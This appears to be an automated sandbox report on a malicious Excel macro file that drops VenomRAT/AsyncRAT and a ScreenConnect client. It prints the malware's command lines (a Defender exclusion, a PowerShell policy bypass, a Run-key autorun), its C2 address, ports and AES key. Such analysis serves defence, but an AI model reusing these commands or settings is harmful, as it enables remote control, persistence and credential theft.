Windows Analysis Report
Document25.xlsm

Overview

General Information

Sample name: Document25.xlsm
Analysis ID: 1637073
MD5: 7ac07195f03358c51fbb2e422a8b5452
SHA1: a4e0c6f0797f655c26d920cf8474e21815435455
SHA256: 5d12f3d6b8c0418215b29ad3afb0a3448966a6eaeb02dca2e89d6bff5d8e2570
Tags: xlsm, user-cocaman

Detection

ScreenConnect Tool, AsyncRAT, StormKitty, VenomRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected StormKitty Stealer
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected landing page (webpage, office document or email)
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide user accounts
Contains functionality to log keystrokes (.Net Source)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Enables network access during safeboot for specific services
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Modifies security policies related information
Office process queries suspicious COM object (likely to drop second stage)
Possible COM Object hijacking
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Explorer NOUACCHECK Flag
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Excel Network Connections
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected ScreenConnect Tool
Yara signature match

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 6328 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • 7z.exe (PID: 5360 cmdline: "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip" MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • regsvr32.exe (PID: 6100 cmdline: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
    • newpoveno.exe (PID: 5140 cmdline: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe" MD5: 41C2401A4ECF9C80796E534D388E56CD)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5932 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7248 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • AddInProcess32.exe (PID: 6368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • cmd.exe (PID: 6068 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6296 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • Document.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\Temp\Document.exe" MD5: F9500A55F06CD124D7406476579A5F7C)
              • msiexec.exe (PID: 1120 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\ea32d473b92f819d\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • explorer.exe (PID: 5240 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cvtres.exe (PID: 2748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 176.65.142.74 4448 HVNC_MUTEX MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chrome.exe (PID: 7228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio MD5: E81F54E6C1129887AEA47E7D092680BF)
            • chrome.exe (PID: 5516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-pre-read-main-dll --field-trial-handle=2120,i,14894441107756567341,7342821476491626957,262144 --variations-seed-version=20231002-080120.576000 --mojo-platform-channel-handle=2256 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • sppsvc.exe (PID: 6996 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 656 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6808 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 6028 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 3528 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1432 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7980 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7328 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • newpoveno.exe (PID: 7468 cmdline: "C:\Users\user\SystemRootDoc\newpoveno.exe" MD5: 41C2401A4ECF9C80796E534D388E56CD)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 7672 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • newpoveno.exe (PID: 7724 cmdline: "C:\Users\user\SystemRootDoc\newpoveno.exe" MD5: 41C2401A4ECF9C80796E534D388E56CD)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • msiexec.exe (PID: 7884 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7608 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5F31D207096A70303A87FAA569F8958D C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 5704 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBE65.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4046546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 2248 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9C864324F3ACEEC3843B308126110901 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3172 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 56F78CA946A322F1A8337330F29E556C E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 8000 cmdline: "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-pi5ke2-relay.screenconnect.com&p=443&s=4e491804-ebd1-4ec1-a81d-3bf98af2b16f&k=BgIAAACkAABSU0ExAAgAAAEAAQDV5xr%2f63eUw3yWSiptbv5fNcp0K%2fm1HgCzug%2fuXVLaE7zXcJaALS5LoNDk%2fCtX1DhHiK7zhI%2bKLvNYucmCVNYhfawyE7GKXdStFwcdW3bdG7Bl1wsDbR9V3DCQtHu0RCULGn2CLbfaMYcxT7HUC8TrGSemBF6idtbA81QikNAwKvc0mAXjUuHQgFKNxH34ev1K7FFVTHQQmAfMWifAR3wQA3I8ZCb2o4gfszrm68%2fq2clfPySQ9B17enljE%2b7B1y8UqGY%2brDfKadO%2fAISlRMCNIopaBIw62z2RT8UYqLCAsO4P%2bQQU%2fFWzzNBS%2bocDYGtZaBBqN9vqtk0Ur5xxoDqt" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 4276 cmdline: "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe" "RunRole" "94bdae91-aed5-45b2-b496-05a680474da1" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • explorer.exe (PID: 2780 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 3044 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 916 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7624 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: Cameleon, StormKitty
Description: PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
{"Host": ["176.65.142.74"], "Port": ["4449", "4448"], "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Install": "false", "Mutex": "daqyvsbasipyrpcr", "Certificate": "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", "Server Signature": "d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk="}
{"Server": "176.65.142.74", "Ports": "4449,4448", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "oyLTzCYJW2NXzjfLQfeGJ9SMmgKS3lF7", "Mutex": "daqyvsbasipyrpcr", "Certificate": "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", "ServerSignature": "d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk=", "BDOS": "null", "External_config_on_Pastebin": "false"}
Source | Rule | Description | Author
C:\Windows\Temp\~DFADB967A848420FAD.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Config.Msi\3dc3b5.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Users\user\SystemRootDoc\nasrallah_x86.dll | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
Source | Rule | Description | Author
00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0000000C.00000002.6331801761.0000000003404000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security
0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security
0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author
37.2.Document.exe.5790000.11.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
27.2.newpoveno.exe.24b5482b0a0.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
27.2.newpoveno.exe.24b5482b0a0.0.unpack | rat_win_dcrat_qwqdanchun | Find DcRAT samples (qwqdanchun) based on specific strings | Sekoia.io
  • 0xd536:$str03: Po_ng
  • 0xc13c:$str04: Pac_ket
  • 0xdcdc:$str05: Perfor_mance
  • 0xdd20:$str06: Install_ed
  • 0x86cd:$str07: get_IsConnected
  • 0x99c8:$str08: get_ActivatePo_ng
  • 0xaa97:$str09: isVM_by_wim_temper
  • 0xd552:$str10: save_Plugin
  • 0xd800:$str11: timeout 3 > NUL
  • 0xd896:$str12: ProcessHacker.exe
  • 0xda88:$str13: Select * from Win32_CacheMemory
27.2.newpoveno.exe.24b5482b0a0.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0xda88:$q1: Select * from Win32_CacheMemory
  • 0xdac8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xdb16:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xdb64:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
22.2.newpoveno.exe.143e7c2b0a0.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\explorer.exe /NoUACCheck, CommandLine: C:\Windows\explorer.exe /NoUACCheck, CommandLine|base64offset|contains: y, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1080, ProcessCommandLine: C:\Windows\explorer.exe /NoUACCheck, ProcessId: 2780, ProcessName: explorer.exe
Source: File created | Author: frack113, Florian Roth | Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 6328, TargetFilename: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ParentProcessId: 5140, ParentProcessName: newpoveno.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5932, ProcessName: powershell.exe
Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6328, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", ProcessId: 5140, ProcessName: newpoveno.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6328, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", ProcessId: 6100, ProcessName: regsvr32.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' , ProcessId: 6296, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: cmd.exe /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ProcessId: 5140, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newpoveno
Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 149.137.136.16, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6328, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49693
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ParentProcessId: 5140, ParentProcessName: newpoveno.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5932, ProcessName: powershell.exe
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.9, DestinationIsIpv6: false, DestinationPort: 49693, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6328, Protocol: tcp, SourceIp: 149.137.136.16, SourceIsIpv6: false, SourcePort: 443
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ParentProcessId: 5140, ParentProcessName: newpoveno.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5932, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 6328, TargetFilename: C:\Users\user\Desktop\~$Document25.xlsm
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, ProcessId: 656, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T10:44:27.292321+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49705 | 13.107.246.60 | 443 | TCP
2025-03-13T10:44:35.088778+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49707 | 13.107.246.60 | 443 | TCP
2025-03-13T10:44:35.133374+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49708 | 13.107.246.60 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T10:49:08.683789+0100 | 2029606 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49720 | 176.65.142.74 | 4448 | TCP
2025-03-13T10:49:15.203649+0100 | 2029606 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49720 | 176.65.142.74 | 4448 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
